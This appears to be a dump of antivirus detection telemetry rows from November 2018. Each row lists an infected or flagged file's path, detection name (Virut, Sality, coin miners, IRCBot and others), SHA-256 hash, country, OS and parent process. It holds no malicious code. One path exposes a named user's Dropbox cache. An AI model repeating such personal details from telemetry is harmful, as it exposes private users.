  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:32:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='152936122.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\152936122.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='BG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T13:29:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243db', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243db', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T05:48:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-234801-d3dc9c74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181104-234734-D0F5F5F2\\AVSCAN-20181104-234801-D3DC9C74', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:19:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131559-2cb656e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131559-2CB656E8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1645a311.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1645a311.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224913-e22f99f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200142-1862C1A1\\AVSCAN-20181104-224913-E22F99F7', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131710-32187d9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131710-32187D9A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered codas', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered codas', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='1e054b0e49b4ec2b7fda968c1089d240a94880ed8917dda7b7e0285db40634b9', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T22:54:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171332-0c913cc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8939ed1\\AVSCAN-20181104-170741-E3C4C545\\AVSCAN-20181104-171332-0C913CC1', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:13:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153440-2ee47973', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2159bcd\\AVSCAN-20181104-153335-260E53C5\\AVSCAN-20181104-153440-2EE47973', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:34:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151546-d46af5a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151546-D46AF5A9', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:15:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\D:\\Games\\Counter Strike 1.6 Русская v43\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:45:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a266a', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a266a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:57:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212950-99bf9b3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212950-99BF9B3F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:29:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:15:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201800-f2ab11db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b3978e3\\AVSCAN-20181104-201654-E6057DD9\\AVSCAN-20181104-201800-F2AB11DB', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Database\\Prog_LPD\\Copy of Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='a14590e76f428468454d177f6f743963a0c516ded28b15bd15fd74b652cab396', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23403_none_793a69235bf87c5b\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='493b4b4ed3e9159001087e3f70b0beab09c6dd2083b9d2883a7d2b943aa17606', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173746-2f826d74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b2e46536\\AVSCAN-20181104-173714-2B105675\\AVSCAN-20181104-173746-2F826D74', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='295cc060e51ac4fe40afe534703f6f4640539b8fd4972281b05c9bb101e33ec5', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:37:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x64.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='5741a738e203397947f6519bda85271e18dab035aaef1750bcca6a7fd9eb93d7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dba8478c09a129961f136ce9c7637c7123fc58d598ff7c7ea69de87160ded126', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DBA8478C09A129961F136CE9C7637C7123FC58D598FF7C7EA69DE87160DED126', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dba8478c09a129961f136ce9c7637c7123fc58d598ff7c7ea69de87160ded126', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:05:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:05:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8f77', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8f77', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d8e5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d8e5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154306-2f40c00a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154249-2D01D064\\AVSCAN-20181104-154306-2F40C00A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:43:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='F:\\HBCD\\Programs\\DigitalRescue4Premium.exe', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='\\\\?\\D:\\Anti Virus\\all norton virsion\\Norton AntiVirus 2003 Pro (final)\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='e96842aadbfbb3743367849ec9d5762a6e3632526b64c98aa5c9e218f9d02d2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lvevsxnu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LveVsXnu.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054132-f2a36c20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b17bb50\\AVSCAN-20181102-054012-E6DB4F4B\\AVSCAN-20181102-054132-F2A36C20', filesize=1024000, name='HEUR/AGEN.1011385.#M1.#R1'), hash='ae40fa4808ef667cfef3e30d183a01ac1babbf001e8ea76fb14ec098c7f613be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gohan ssj2.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gohan SSJ2\\Gohan SSJ2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e1486cf98428898fa3bee94bd339d757cc4717d8be12731a94652a31a5410612', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110223-bdde6436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28b44806\\AVSCAN-20181102-105950-ADF1FC32\\AVSCAN-20181102-110223-BDDE6436', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cblauncher.exe', filepath='C:\\Program Files\\CodeBlocks\\CbLauncher.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='b5895f54134046f4670ecd0aa863be52c73dcd0e8c6a601986568425f45110ea', metadata=Row(cmdline='--engine=2 --session-id=NwUEoGVbvmb4ZON7gfbxMGQc+DPM3QTwHWNVeL9u --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-02T19:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fsquirt.exe', filepath='C:\\Windows\\winsxs\\x86_bth.inf_31bf3856ad364e35_6.1.7601.17514_none_744c2e2719d350a0\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='bcdbe80ba6d11101b3c2b57bef58bb5e8d6789bdcb5a21b05cc2b41fbeb38d4c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\servicing\\TrustedInstaller.exe', parentsize=204800, timestamp='2018-11-02T14:01:20Z'), dt=datetime.date(2018, 11, 2)),
